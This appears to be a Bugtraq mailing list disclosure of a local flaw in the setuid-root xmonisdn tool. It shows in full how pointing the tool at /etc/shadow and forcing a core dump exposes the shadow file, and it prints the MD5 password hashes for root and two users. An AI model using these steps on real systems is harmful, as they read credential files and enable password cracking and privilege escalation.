From: Ron van Daal <ronvdaal@SYNTONIC.NET>

Hello,

While playing with xmonisdn (included in the isdn4k-utils package),
I discovered a little bug. I didn't find anything regarding xmonisdn
in the Bugtraq archives, so here's a quick post.

I'm wondering if other xmonisdn users can reproduce this exploit.
(Tested on my workstation, which is running Red Hat Linux 6.0)

[syntonix@damien bin]# pwd; ls -al xmonisdn
/usr/bin
-rwsr-xr-x   1 root     root        13528 Mar  4  1998 xmonisdn
[syntonix@damien bin]# xmonisdn -file /etc/shadow
Warning: Cannot convert string "netactive" to type Pixmap
Warning: Cannot convert string "netactiveout" to type Pixmap
Warning: Cannot convert sWarning: Cannot convert string "netstop" to type Pixmap

[1]+  Stopped                 xmonisdn -file /etc/shadow
[syntonix@damien bin]# bg
[1]+ xmonisdn -file /etc/shadow &
[syntonix@damien bin]# killall -8 xmonisdn
[1]+  Floating point exception(core dumped) xmonisdn -file /etc/shadow
[syntonix@damien bin]# strings core|less

<snip>
/lib/ld-linux.so.2
root:$1$Fijz9O0n$ku/VSK.h6cbTV5oueAAwz/:10883:0:99999:7:-1:-1:134538500
bin:*:10878:0:99999:7:::
daemon:*:10878:0:99999:7:::
adm:*:10878:0:99999:7:::
lp:*:10878:0:99999:7:::
sync:*:10878:0:99999:7:::
shutdown:*:10878:0:99999:7:::
halt:*:10878:0:99999:7:::
mail:*:10878:0:99999:7:::
news:*:108operator:*:10878:0:99999:7:::
games:*:10878:0:99999:7:::
gopher:*:10878:0:99999:7:::
ftp:*:10878:0:99999:7:::
nobody:*:10878:0:99999:7:::
xfs:!!:10878:0:99999:7:::
ronvdaal:$1$Dc92cqLj$V/HSANaVuwCMxGjFfZC/T0:10883:0:99999:7:-1:-1:134538492
syntonix:$1$h3yIM.h/$JjBLYPvb4Zcjv1tb.21Uw/:10883:0:99999:7:-1:-1:134538484
<snip>

--
Ron van Daal          | Syntonic Internet | tel. +31(0)46-4230738
ronvdaal@syntonic.net | www.syntonic.ne